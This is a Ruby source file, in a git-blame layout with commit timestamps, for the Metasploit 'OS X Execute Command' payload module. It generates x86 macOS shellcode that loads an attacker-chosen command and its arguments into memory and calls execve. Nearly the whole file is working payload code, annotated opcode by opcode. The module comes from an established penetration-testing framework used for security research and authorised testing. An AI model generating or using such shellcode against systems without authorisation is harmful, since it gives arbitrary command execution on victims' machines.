2008-02-09 07:58:38 +00:00
|
|
|
##
|
2014-10-17 16:47:33 +00:00
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
2013-10-15 18:50:46 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2008-02-09 07:58:38 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
|
|
|
|
|
|
|
###
|
|
|
|
#
|
|
|
|
# Exec
|
|
|
|
# ----
|
|
|
|
#
|
|
|
|
# Executes an arbitrary command.
|
|
|
|
#
|
|
|
|
###
|
2008-10-02 05:23:59 +00:00
|
|
|
module Metasploit3
|
2008-02-09 07:58:38 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
include Msf::Payload::Single
|
|
|
|
include Msf::Payload::Osx
|
2008-02-09 07:58:38 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def initialize(info = {})
|
|
|
|
super(merge_info(info,
|
|
|
|
'Name' => 'OS X Execute Command',
|
|
|
|
'Description' => 'Execute an arbitrary command',
|
|
|
|
'Author' =>
|
|
|
|
[
|
|
|
|
'snagg <snagg[at]openssl.it>',
|
|
|
|
'argp <argp[at]census-labs.com>',
|
2013-10-07 17:49:20 +00:00
|
|
|
'joev'
|
2013-08-30 21:28:54 +00:00
|
|
|
],
|
|
|
|
'License' => BSD_LICENSE,
|
|
|
|
'Platform' => 'osx',
|
|
|
|
'Arch' => ARCH_X86
|
|
|
|
))
|
2008-02-09 07:58:38 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
OptString.new('CMD', [ true, "The command string to execute" ]),
|
|
|
|
], self.class
|
|
|
|
)
|
|
|
|
end
|
2008-02-09 07:58:38 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
#
|
|
|
|
# Dynamically builds the exec payload based on the user's options.
|
|
|
|
#
|
|
|
|
def generate_stage
|
|
|
|
cmd_str = datastore['CMD'] || ''
|
|
|
|
# Split the cmd string into arg chunks
|
|
|
|
cmd_parts = Shellwords.shellsplit(cmd_str)
|
|
|
|
# the non-exe-path parts of the chunks need to be reversed for execve
|
|
|
|
cmd_parts = ([cmd_parts.first] + (cmd_parts[1..-1] || []).reverse).compact
|
|
|
|
arg_str = cmd_parts.map { |a| "#{a}\x00" }.join
|
2013-07-18 00:20:47 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
payload = ''
|
2013-07-18 18:36:31 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
# Stuff an array of arg strings into memory
|
|
|
|
payload << "\x31\xc0" # xor eax, eax (eax => 0)
|
|
|
|
payload << Rex::Arch::X86.call(arg_str.length) # jmp over CMD_STR, stores &CMD_STR on stack
|
|
|
|
payload << arg_str
|
|
|
|
payload << "\x5B" # pop ebx (ebx => &CMD_STR)
|
2013-07-18 00:20:47 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
# now EBX contains &cmd_parts[0], the exe path
|
|
|
|
if cmd_parts.length > 1
|
|
|
|
# Build an array of pointers to arguments
|
|
|
|
payload << "\x89\xD9" # mov ecx, ebx
|
|
|
|
payload << "\x50" # push eax; null byte (end of array)
|
|
|
|
payload << "\x89\xe2" # mov edx, esp (EDX points to the end-of-array null byte)
|
2013-07-18 18:36:31 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
cmd_parts[1..-1].each_with_index do |arg, idx|
|
|
|
|
l = [cmd_parts[idx].length+1].pack('V')
|
|
|
|
# can probably save space here by doing the loop in ASM
|
|
|
|
# for each arg, push its current memory location on to the stack
|
|
|
|
payload << "\x81\xC1" # add ecx, ...
|
|
|
|
payload << l # (cmd_parts[idx] is the prev arg)
|
|
|
|
payload << "\x51" # push ecx (&cmd_parts[idx])
|
|
|
|
end
|
2013-07-18 18:36:31 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
payload << "\x53" # push ebx (&cmd_parts[0])
|
|
|
|
payload << "\x89\xe1" # mov ecx, esp (ptr to ptr to first str)
|
|
|
|
payload << "\x52" # push edx
|
|
|
|
payload << "\x51" # push ecx
|
|
|
|
else
|
|
|
|
# pass NULL args array to execve() call
|
|
|
|
payload << "\x50\x50" # push eax, push eax
|
|
|
|
end
|
2008-02-09 07:58:38 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
payload << "\x53" # push ebx
|
|
|
|
payload << "\xb0\x3b" # mov al, 0x3b (execve)
|
|
|
|
payload << "\x50" # push eax
|
|
|
|
payload << "\xcd\x80" # int 0x80 (triggers execve syscall)
|
2013-07-18 00:20:47 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
payload
|
|
|
|
end
|
2010-04-30 08:40:19 +00:00
|
|
|
end
|